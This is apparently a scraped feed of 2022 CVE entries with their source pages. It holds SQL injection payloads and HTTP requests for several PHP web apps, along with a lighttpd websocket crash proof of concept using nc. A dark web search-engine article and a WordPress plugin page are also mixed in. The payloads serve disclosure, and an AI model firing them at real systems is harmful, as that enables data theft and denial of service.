Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editcategory.php.

Permalink

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editcategory.php?id=

Vulnerability location: /garage/editcategory.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editcategory.php?id=-1%27+union+select+1,database(),3,4--+ // Leak place ---> id

GET /garage/editcategory.php?id\=\-1%27+union+select+1,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-38606: bug_report/SQLi-1.md at main · sunaono1/bug_report

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_event.php.

Permalink

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: Broccoli

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_event.php?id=

Vulnerability location: /cman/admin/edit\_event.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_event.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /cman/admin/edit\_event.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38605: bug_report/SQLi-1.md at main · sunaono1/bug_report

In lighttpd 1.4.65, mod_wstunnel does not initialize a handler function pointer if an invalid HTTP request (websocket handshake) is received. It leads to null pointer dereference which crashes the server. It could be used by an external attacker to cause denial of service condition.

There's a null pointer dereference bug that crashes the whole server if mod\_wstunnel is enabled and the server receives invalid HTTP Websocket Handshake request. This issue could be abused by a remote attacker to cause Denial of Service condition.

The vulnerability was detected on Ubuntu 22.04 x86\_64:  
\- lighttpd 1.4.65 built from source  
\- lighttpd 1.4.63 installed from ubuntu repository  
\- lighttpd 1.4.66 from github (master, 5d80e41ab2585288b0bbe0ebf8f3e3b120a0f403)

In the "wstunnel\_handler\_setup" function, the server verifies a request and if it's valid, it initializes handler functions. If the request has invalid (not a number) value in the "Sec-WebSocket-Version" header, it sets http status to 400 and exits the function without setting "hctx->create\_env" function pointer. Then, the server reaches to the "gw\_write\_request" function where it tries to call "hctx->create\_env(hctx)", however, the "hctx->create\_env" value is null leading to crash.

mod\_wstunnel.c:  

    static handler_t wstunnel_handler_setup (request_st * const r, plugin_data * const p) {
        handler_ctx *hctx = r->plugin_ctx[p->id];
        int hybivers;
        hctx->errh = r->conf.errh;/*(for mod_wstunnel-specific DEBUG_* macros)*/
        hctx->conf = p->conf; /*(copies struct)*/
        hybivers = wstunnel_check_request(r, hctx);
        if (hybivers < 0) return HANDLER_FINISHED;
       [...]
        hctx->gw.create_env       = wstunnel_create_env;
        hctx->gw.handler_ctx_free = wstunnel_handler_ctx_free;
    
    

    static int wstunnel_check_request(request_st * const r, handler_ctx * const hctx) {
        const buffer * const vers =
          http_header_request_get(r, HTTP_HEADER_OTHER, CONST_STR_LEN("Sec-WebSocket-Version"));
        const long hybivers = (NULL != vers)
          ? light_isdigit(*vers->ptr) ? strtol(vers->ptr, NULL, 10) : -1
          : 0;
        if (hybivers < 0 || hybivers > INT_MAX) {
            DEBUG_LOG_ERR("%s", "invalid Sec-WebSocket-Version");
            r->http_status = 400; /* Bad Request */
            return -1;
        }
    
    

gw\_backend.c:  

    static handler_t gw_write_request(gw_handler_ctx * const hctx, request_st * const r) {
        switch(hctx->state) {
    [...]
        case GW_STATE_PREPARE_WRITE:
            /* ok, we have the connection */
    
            {
                handler_t rc = hctx->create_env(hctx);
                if (HANDLER_GO_ON != rc) {
    
    

**PoC:**

1\. Download and build the server from source:  

$ wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.65.tar.gz
$ tar zxf lighttpd-1.4.65.tar.gz 
$ cd lighttpd-1.4.65/
$ cmake -DCMAKE\_INSTALL\_PREFIX=/usr/local -Wno-dev .
$ make -j 4
$ sudo make install

2\. Prepare configuration

/home/osboxes/echo.pl:  

#!/usr/bin/perl -Tw
$SIG{PIPE} = 'IGNORE';
for (my $FH; accept($FH, STDIN); close $FH) {
    select($FH); $|=1; # $FH->autoflush;
    print $FH $\_ while (<$FH>);
}

/home/osboxes/webroot/ws.html:  

<!DOCTYPE html>

<pre id="log"></pre>
    <script>
          // helper function: log message to screen
          var logelt = document.getElementById('log');
  function log(msg) { logelt.textContent += msg + '\\n'; }
  // helper function: send websocket msg with count (1 .. 5)
  var ll = 0;
  function send\_msg() { if (++ll <= 5) { log('SEND: '+ll); ws.send(ll+'\\n'); } }
  // setup websocket with callbacks
  var ws = new WebSocket('ws://localhost:3000/ws/');
  ws.onopen = function()         { log('CONNECT\\n'); send\_msg(); };
  ws.onclose = function()        { log('DISCONNECT'); };
  ws.onmessage = function(event) { log('RECV: ' + event.data); send\_msg(); };
    </script>

/home/osboxes/server.conf:  

server.document-root = "/home/osboxes/webroot" 
server.port = 3000
mimetype.assign = (
  ".html" => "text/html",
)

server.modules += ("mod\_wstunnel")
wstunnel.server = (
  "/ws/" => (
    (
      "socket" => "/dev/shm/psock",
      "bin-path" => "/home/osboxes/echo.pl",
      "max-procs" => 1
    )
  )
)

3\. Run the server  

$ lighttpd -D -f ~/server.conf

4\. Optional - open a website in a browser to confirm that websocket configuration works  

$ firefox http://localhost:3000/ws.html

5\. Optional - send valid request  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: 13\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Sec-WebSocket-Accept: vdMhuNAtgTQZJEwrIEBtPElq0RM=
Connection: upgrade
Date: Tue, 02 Aug 2022 20:40:38 GMT
Server: lighttpd/1.4.65

6\. Send invalid request (\`Sec-WebSocket-Version: x\`) - crash the server  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: x\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 400 Bad Request
Transfer-Encoding: chunked
Date: Tue, 02 Aug 2022 20:41:13 GMT
Server: lighttpd/1.4.65

$ lighttpd -D -f server.conf 
2022-08-02 16:39:44: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)
    Segmentation fault (core dumped)

$ gdb --args lighttpd -D -f server.conf 
(gdb) r
Starting program: /usr/local/sbin/lighttpd -D -f server.conf
\[Thread debugging using libthread\_db enabled\]
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".
2022-08-02 16:41:47: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) up
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
1993                handler\_t rc = hctx->create\_env(hctx);
(gdb) print hctx->create\_env
$1 = (handler\_t (\*)(struct gw\_handler\_ctx \*)) 0x0
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
#2  0x000055555559dd27 in gw\_send\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2154
#3  0x000055555559e1f6 in gw\_handle\_subrequest (r=0x5555555e1230, p\_d=0x5555555db1f0) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2264
#4  0x000055555556a857 in connection\_handle\_write\_state (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:473
#5  0x000055555556bd67 in connection\_state\_machine\_loop (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1028
#6  0x000055555556c805 in connection\_state\_machine\_h1 (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1341
#7  0x000055555556c87d in connection\_state\_machine (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1356
#8  0x0000555555566b4c in server\_run\_con\_queue (joblist=0x5555555e1230, sentinel=0x5555555d3b60 <log\_con\_jqueue>) at /home/osboxes/lighttpd-1.4.65/src/server.c:1958
#9  0x0000555555566c95 in server\_main\_loop (srv=0x5555555d5540) at /home/osboxes/lighttpd-1.4.65/src/server.c:2011
#10 0x0000555555566e86 in main (argc=4, argv=0x7fffffffe138) at /home/osboxes/lighttpd-1.4.65/src/server.c:2085

Discovered by Michał Dardas

CVE-2022-37797: Bug #3165: mod_wstunnel null pointer dereference - Lighttpd

In Library Management System 1.0 the /card/in-card.php file id_no parameters are vulnerable to SQL injection.

    POST /LMS/card/id-card.php HTTP/1.1
    Host: 172.20.10.14
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Content-Length: 112
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=8l03mutpmr44pg0gv96afbujmn
    Origin: http://172.20.10.14
    Referer: http://172.20.10.14/LMS/card/id-card.php
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    
    id_no=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707171,0x686a467041767a434e5574435a446348437562755059707141736f7047694178686e787163596d6e,0x717a6a7a71),NULL#&search=

CVE-2022-37794: CVE_demo/Library Management System with QR code Attendance and Auto Generate Library Card - SQL injections.md at main · anx0ing/CVE_demo

By Waqas
When it comes to the best dark web search engines, first and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.
This is a post from HackRead.com Read the original post: 8 Online Best Dark Web Search Engines for Tor Browser (2022)

The **Dark Web**, also known as the Dark Net, is a part of the Internet that is not accessible through standard web browsers. It can only be accessed through specialized software such as the Tor browser.

The Dark Web is often associated with illegal activity such as cybercrime including drug dealing, child abuse, and terrorism. However, there are also many legitimate uses for the Dark Web, such as anonymity for whistleblowers and journalists. **Facebook** and **Twitter** also have their dark web domains. (_If you didn’t know now you know_).

Despite its reputation, the Dark Web is a relatively small part of the overall Internet. It is estimated that only around 4% of all websites are accessible through the **Tor browser**.

**What is a Tor Browser?**

The Tor Browser is a free and open-source web browser that is based on the Mozilla Firefox web browser. The Tor Browser is designed to protect your privacy and anonymity when using the internet.

The Tor Browser routes your internet traffic through a network of servers, making it difficult for anyone to track your online activity. The Tor Browser is available for Windows, macOS, and Linux.

Tor is short for “The Onion Router”. The Tor network was **originally developed** by the US Naval Research Laboratory as a way to securely communicate between government agencies.

The Tor network consists of a series of volunteer-run servers that route internet traffic through a series of encrypted tunnels. This makes it difficult for anyone to track your online activity or identify your location.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**You May Also Like**

1.  **What Are Dark Web Search Engines and How to Find Them?**
2.  **Brave Browser enters dark web with its own Tor Onion service**
3.  **Online Anonymity – How to Keep Yourself Safe and Unidentified**
4.  **Why torrenting on Elon Musk’s Starlink Internet is not a good idea?**
5.  **USA Wants Russians to Share Secret Info with the CIA on the Dark Web**

**Best Dark Web Search Engines for Tor Browser**

When it comes to the best dark web search engines, there are a few things to keep in mind. First and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.

Additionally, you want a search engine that is fast and efficient, so you can get the information you need without any delays. Assuming those are your priorities, here are 8 dark web search engines to use with Tor Browser:

**1\. Ahmia.fi**

Ahmia.fi is a search engine designed to allow access to the so-called “dark web” or “dark net” – a hidden part of the internet that can only be accessed using specific software, such as the Tor browser.

Ahmia is one of a small number of dark web search engines that allow users to access the dark web, and it has been praised for making this otherwise hidden part of the internet more accessible.

However, Ahmia also has a policy against any “abuse material,” something different from many other dark web search engines that also index websites featuring child sexual abuse content.

Ahmia is available on the **surface web** and supports searches on the i2p network as well. You can visit Ahmia’s .Onion domain **here**. 

Home page of Ahmia dark web search engine

**2\. Haystak**

Haystak is one of the dark web search engines designed for the Tor network. The search engine claims to have indexed over 1.5 billion pages which includes more than 260,000 websites, Haystak indeed would stand out to be a resourceful engine on the list.

Haystak also has a paid version which offers a number of additional features such as searching using regular expressions, browsing now-defunct onion sites, and accessing their API. You can visit Haystak by following its .Onion link **here**. 

Home page of Haystak dark web search engine

**3\. The Hidden Wiki**

The Hidden Wiki is a dark web directory that can only be accessed using the Tor network. The site contains links to a variety of different websites. The Hidden Wiki is a valuable resource for those who wish to explore the dark web, as it provides a safe and easy way to access a variety of different sites.

A **surface web version** is also available. You can visit The Hidden Wiki by following its .Onion link **here**. 

Home page of The Hidden Wiki

**4\. Torch**

Torch is one of those dark web search engines that have lasted for long enough (since 1996). Torch, like other search engines, crawls these addresses and indexes their content, making it searchable for users.

However, speaking based on personal experience, its search results are not impressive. For instance, I wanted to know Twitter’s onion URL, a very simple piece of information. Yet, it reported everything but that showing how far these search engines have to go in order to improve.

On the other hand, it is fast and can come in handy regardless. Nevertheless, you can visit Torch by following its .Onion link **here**. 

Home page of Torch dark web search engine

**5\. Recon**

This particular search engine was built by Hugbunt3r, a prominent member of the popular **Dread service** on the dark web. It aims to serve as a database through which users can search for products from different vendors in different marketplaces on the dark web.

Individual profile viewing options for vendors & marketplaces are also available including details like ratings, mirror links, number of listings, and uptime percentage. You can visit Recon by following its .Onion link **here** and just in case you manage to bypass its DDoS protection captcha page let us know in the comment section because we failed to do so. (_Good luck_).

Home page of Recon dark web search engine

**6\. DuckDuckGo**

Did you know DuckDuckGo is available on the dark web and they have their .Onion domain as well? Yes, but it only displays results from the surface web even if used on the Tor browser.

Yet, when it comes to anonymity DuckDuckGo has a proven track record which is why the privacy advocate team behind DDG is known as a long-time foe of Google. You can visit DuckDuckGo by visiting its .Onion link **here**. 

Home page of DuckDuckGo dark web search engine

**7\. Onion Search**

Onion Search is a search engine for the dark web that enables users to find and access Onion sites. The site is designed to be used with the Tor browser, which allows users to browse the internet anonymously.

A look at its about page reveals that the search engine is being operated from France as the search engine acknowledges to be “fully compliant with the Law of France.” Another noteworthy option on the search engines is that one can report child abuse content to the administrator who vows to remove it.

Onion Search is available on the **clear net** as well as on the dark web through its **.Onion domain**.

Home page of Onion Search dark web search engine

**8\. Deep Search**

Deep Search is a search engine for the dark web. It is designed to index and search onionspace, the hidden services portion of the Tor network. DeepSearch is open source and available for anyone to use.

According to my personal experience, Deep Search seems to provide pretty accurate and useful results, unlike others who spam users with spam links. Another noteworthy feature of Deep Search is that it provides a list of marketplaces, exchanges, and websites involved in scamming users.

If you want to give Deep Search a try check their .Onion domain **here**.

Home page of Deep Search dark web search engine

To conclude, you may also find the links of other dark web search engines but these happen to be the ones that stand out the most.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**What NOT TO DO on Dark Web?**

The dark web is a place full of potential danger. There are many things that can go wrong when visiting the dark web, and it’s important to be aware of them before you go. Here are some things to avoid doing on the dark web:

*   Don’t click on any links unless you know where they lead. Many links on the dark web lead to illegal drug markets, child abuse content, malicious sites, or downloads.

*   Never enter your personal information into any form on the dark web. This includes your name, address, email, and phone number.

*   Don’t download anything from the dark web unless you trust the source. There are many viruses and malware lurking on the dark web, waiting to be downloaded by unsuspecting users.

*   Never ever download illegal and abusive content that includes content against children, torture, blackmail, and other malicious content.

**Use a VPN**

Although the Tor browser protects your online privacy using a **reliable VPN** at the same time is a plus. A VPN will encrypt your traffic and hide your IP address, making it much harder for someone to track you down. Additionally, if you are on a clear net, a VPN will give you access to blocked websites and content.

1.  **Tor Anonymity: Things NOT To Do While Using Tor**
2.  **CISA Publishes List of Free Cybersecurity Tools and Services**
3.  **New Underactor tool reveals pixelated text to expose sensitive data**
4.  **Download Kali Linux 2022.1 with new tools and wider SSH compatibility**
5.  **Cybersecurity, Big Data, Automation Tools: What Marketers Need To Know**

8 Online Best Dark Web Search Engines for Tor Browser (2022)

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

Unauthenticated Event Deletion vulnerability in Totalsoft Event Calendar – Calendar plugin <= 1.4.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Event Calendar is a flexible calendar plugin that allows you to connect to your database and show up your event days on a view. Calendar can render a Day, Week, Month and Resource calendar view. The also provides an interface for manipulating and formatting dates and times. Each event box has a link to the original event you defined in your calendar.

*   Event Calendar Premium
*   All Calendar Demo Types
*   Event Calendar FAQ
*   Event Calendar User Manual
*   Support Forum

**Features**

*   Plugin for create a calendar with events.
*   Intuitive event labels.
*   Easy to customize.
*   Use as a date picker or a full fledged calendar.
*   10 free themes with the option of select data ranges, mark events and others (4 versions of the event calendar type, 2 versions of the simple type, 2 versions of the flexible type and 2 versions of the timeline type)
*   You can easily list your events on wherever you want on your page via shortcodes.
*   Each event box has a link to the original event you defined in your calendar.
*   Allows you to set the most appropriate navigation arrows, which will suit the best for your web site.
*   The ability to display multiple events for a single day.
*   Plugin lets you change the color and set it to the colors of your site.
*   You can change the start and end date of the event.
*   You can change the start and end time of events.
*   You can customize the calendar color, font size and font family.
*   The ability to change the color of the arrow and background color.
*   Each species has a unique customizable settings.
*   Add an unlimited number of events in one calendar. As you have already created a number of events, you can add via the shortcodes on your page as you need.
*   Each calendar can be inserted in a page, post or widget shortcode.
*   You can add photos to the events (all types)
*   Total Calendar, Timeline, Crazy, Schedule and Full Year types each event has its own color.
*   Recurring events
*   Possibility to preview the theme in calendar before putting it on the page.

**Premium version adds**

*   3 beautiful customizable themes
*   Crazy Calendar Theme
*   Schedule Theme
*   Full Year Calendar Theme
*   **Recurring events** – Daily, Weekly, Monthly, Yearly
*   **WeekDay Start** – Can select that day, which must be the first in the week.
*   **Weekday** – Ability to select the style of calendar week.
*   **Todays numbers Color** – Can choose the date color, that will be displayed.
*   **Icon** – Possibility select the right and the left icons, which are, for change the months by sequence.
*   **Color** – The plugin allows to change the color and enter it in the colors of your site.
*   **Font** – The plugin allows to change the color of the date, font size and font family.
*   This opens up new useful functions and new possibilities.

**In addition to the features mentioned above, there are many other functions inside the plugin. You get the advantage of an intuitive user interface, that makes the plugin operation easy, easy to understand the calendar options, as well as many hooks and filters to control the output.**

**Main features of Event.**

*   **Event Title** – You can give a name for event.
*   **Calendar Name** – Choose that version of themes, in which you want to see the Events.
*   **Start Date** – You Can select the start of the event (To display events in the calendar if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **End Date** – You Can select the finish date of the event (To display events if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **Event URL** – You can set external URL, which should be included in the event.
*   Open in new tab – Choose, by clicking on the link should open in new tab or not.
*   **Start Time (Required field)** – Can select the event start time (To display events in the calendar if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **End Time (Required field)** – Can select the event end time (To display events if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **Event color** – Select that color, which you want to see for your event, which shows in the calendar (Event Color option is only for Event Calendar Type.).
*   **Description** – You can give a description for event.
*   **Event Image/Video** – You can give a Image and Video(YouTube and Vimeo) for event. Event Image and Video option is available for all types.

**Insert plugin to the WordPress page, post, widget** – Every calendar could be inserted into a page, post or widget with shortcode.

**Plugin works in Chrome, Safari, Opera, Firefox, Internet Explorer** – Use your calendar with all the popular browsers.

**Navigation Arrow** – Plugin allows you to get the most suitable navigation arrows that fit best for your website.

**The Plugin is Truly Wonderful** – You can create a very nice and beautiful calendar for your website. The plugin is easily editable and functionality perfectly.

**Link** – There is a special place for adding a Link to each event. Choose to open the Link in the new tab or not.

**Technical Support**

*   If you notice any errors or have any questions with our event calendar, you can notify us. We will investigate and solve the problem. Check out the Event Calendar Support Forum on our website. If you don’t find a solution to your question here, don’t hesitate to click here to contact us.

THANK YOU FOR YOUR INTEREST IN EVENT CALENDAR TS.

Here’s how you install and activate the Event Calendars plugin:

Download the plugin.  
Upload the .zip file in your WordPress plugin directory.  
Activate the plugin from the “Plugins” menu in WordPress.  
After activating Event Calendar, choose the type of version you wish to use.

For users of MAC

*   Go to the downloads folder and local the folder with the event calendar.
*   Right click on the folder and select Compress. Now you have just created the .zip file, which can be installed as described here.
*   Click the download and install button to download and install the plugin.
*   Click the Activate plugin button to activate the calendar plugin.
*   If the installation is succeeded, you will see a message in the image.
*   In case of any problems during the installation of the calendar, please click here to contact us.

**1). There are some restrictions for adding events?**

*   There is no limit for the amount of events.
*   You can add as many events as you want. Plugin has no limitations.

**2.) How many calendar may I create for WordPress website?**

*   You may create unlimited calendars by this plugin and by many options.

**3.) How to change the font size of the theme?**

*   The settings can include custom header settings where you can adjust the font size and see the results in the live preview.

**4.) How can I add plugin in widget?**

*   Get to the widget, then add our plugin widget to the sidebar. Then select your name.

**5.) How many themes can I create for my plugin?**

*   You can create as many themes as you want.

**6.) \*\*\*\* Where to change the settings?**

*   The settings you can change in the manager’s calendar.

**7.) I create an event in the calendar but it does not show. What can I do?**

*   First, check that you don’t have the same plugin again.
*   It is necessary to write the begging and ending day of the event.
*   If you have Safari, Firefox, Opera or Internet Explorer, you must write yyyy-mm-dd , that would show the events in calendar.

**8). How many calendar themes can I create for my plugin?**

*   You can create as many themes as you want.

**9.) How many event can I create for my plugin?**

*   You can create as many events as you need.

**10.) Has each event own color or color is for everyone in Simple Type?**

*   In this version you are setting events color in general options and its for all events. In Total Calendar and Timeline types each event has its own color.

**11.) How to change date format?**

*   If you need to change event date format, please open Event Manager Settings and type necessary type in Date format input. For instance, in case you want to have dates as 08/1/2020, set the format to M/d/Y.

awesomeness in this calendar

I bought the full version. After installing on my template, not everything was fine, but the support from the developer was great / fast. The calendar fully suits me both in terms of features and usability bars - on pages or widgets. So far, I am very satisfied.

In my case I needed a yearly calendar. It is the plugin that I was looking for. Functional, easy to use, cheap ... In addition, the customer service is incredible. I definitely recommend it.

This plugin is all I need for a simple event calendar with no bells and whistles. Had some issues in the beginning with the backend but support fixed them quickly and released an updated version. The only issues I have now, I have with all free plugins. They all seem to think it is okay to bombard us with promotions to upgrade to pro. If that is what we wanted we would have done this once we confirmed the plugin was well structured and we could use the added features. Why not allow us to remove the promos forever? After all there is a link to your page inside the plugin itself if we change our minds later.

We had a Problem with the Size of the Date for one Calendar Type, because we wanted it to be different from the headline of one event, so we contacted the Support. It was really really fast and help us out as fast as possible. They even changed the code for us so we got what we wanted. I never saw that Developer made a change for one single user. Its awesome Service in my opinion! I would recommend this plugin again, if you want to use a simple but clear calendar plugin for wordpress.

Read all 98 reviews

“Event Calendar – Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    totalsoft

**Version 1.4.8**

*   Changed TS Poll plugin banner

**Version 1.4.7**

*   Fixed a bug in the plugin.

**Version 1.4.6**

*   Fixed issue with theme options.

**Version 1.4.5**

*   Fixed bug with admin panel.

**Version 1.4.4**

*   Added the ability to change the icon to events.
*   Changed several fonts.
*   Fixed bugs related to PHP 8 version.

**Version 1.4.3**

*   Fixed bug in “update” functions.

**Version 1.4.2**

*   Fixed bug in “edit” functions.

**Version 1.4.1**

*   Changed function for font size.
*   Fixed issue in events option.

**Version 1.4.0**

*   Fixed a bug for showing the event.

**Version 1.3.9**

*   Added font for days on the calendar.
*   Fixed bug related icons.

**Version 1.3.8**

*   Added the ability to put days on the center.

**Version 1.3.7**

*   Added the ability to select icons back to the calendar after the event.

**Version 1.3.6**

*   Fixed a bug in the Timeline type. After changing the language this type was did not work.

**Version 1.3.5**

*   Added a new opportunity in the timeline version. Shows the current days at first.
*   Fixed a bug in the flexible version. The start and the end of days in the event, showed only the starting day.
*   Fixed a bug in the Timeline version. When the year did not had any event it do not show the next year�s events.

**Version 1.3.4**

*   The bug in the “Total Soft Calendar” version has been fixed. The description is not shown in the calendar.
*   Fixed a bug with recurring events.

**Version 1.3.3**

*   Added possibility to preview the theme in calendar before putting it on the page.
*   Updated translations.
*   Changed admin menu design.

**Version 1.3.2**

*   Added Google fonts to the basic fonts.
*   Added possibility to make recurring events.
*   Added box shadow options for all types.
*   Fixed bug with media uploading process.

**Version 1.3.1**

*   Updated function for creating Simple type.

**Version 1.3.0**

*   Changed Media uploading function.
*   Changed admin menu style.
*   Added languages for Timeline type.
*   Changed function for constructing Timeline calendar.

**Version 1.2.9**

*   Changed CSS style for Flexible Calendar type.
*   Updated uploading function for videos and images.
*   Changed Basic function for creating Timeline Calendar.

**Version 1.2.8**

*   Fixed bug In Flexible Calendar type (Did not show the year in the calendar).
*   Changed all functions for creating calendar.
*   Updated the function for creating the events by ordering.

**Version 1.2.7**

*   Fixed PHP error in widget.

**Version 1.2.6**

*   Fixed a bug in the widget.

**Version 1.2.5**

*   Added new Type of calendar: ” Timeline Calendar “
*   Opened some functions for free version.

**Version 1.2.4**

*   Added possibility to create more than one flexible Calendar on the same page.

**Version 1.2.3**

*   Added Secondary question for deleting calendar or events.

**Version 1.2.2**

*   Added new text editor for making event description.

**Version 1.2.1**

*   In Category ” Total Products ” added new plugin ” Event Calendars ” by Total-Soft.

**Version 1.2.0**

*   Modified the Design Admin Panel.

**Version 1.1.9**

*   Added possibility to create more than one Simple Calendar on the same page.

**Version 1.1.8**

*   Tested with WP version 4.7.3.

**Version 1.1.7**

*   Added a function into the first and second versions. You can add descriptions, pictures, videos and choose time format.

**Version 1.1.6**

*   Added a new color picker type.
*   Opened some functions for free version.

**Version 1.1.5**

*   Added translations in several languages for the month names and weekday names.
*   Fixed bug in Flexible Calendar type with translation.

**Version 1.1.4**

*   Added new menu in the plugin.

**Version 1.1.3**

*   Fixed bugs in the 3 calendar types.

**Version 1.1.2**

*   Added new Calendar Type “Flexible Calendar” in which you can add events with images and videos from YouTube and Vimeo.

**Version 1.1.1**

*   Added Italian translation.

**Version 1.1.0**

*   Fixed a bug with icons.

**Version 1.0.8**

*   Issue with date format solved

**Version 1.0.7**

*   Fixed a problem with the widget

**Version 1.0.6**

*   Added new Type of calendar: ” Simple Calendar “

**Version 1.0.5**

*   Changed in the Admin panel
*   Added educational text for the users how to adjust the calendar

**Version 1.0.4**

*   Fixed Syntax Error

**Version 1.0.3**

*   Changed free version some parameters

**Version 1.0.2**

*   Fixed a bug in the event

**Version 1.0.1**

*   Fixed a little bug that was affecting some users

**Version 1.0.0**

*   Initial Version Release

CVE-2022-38067: Event Calendar – Calendar

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

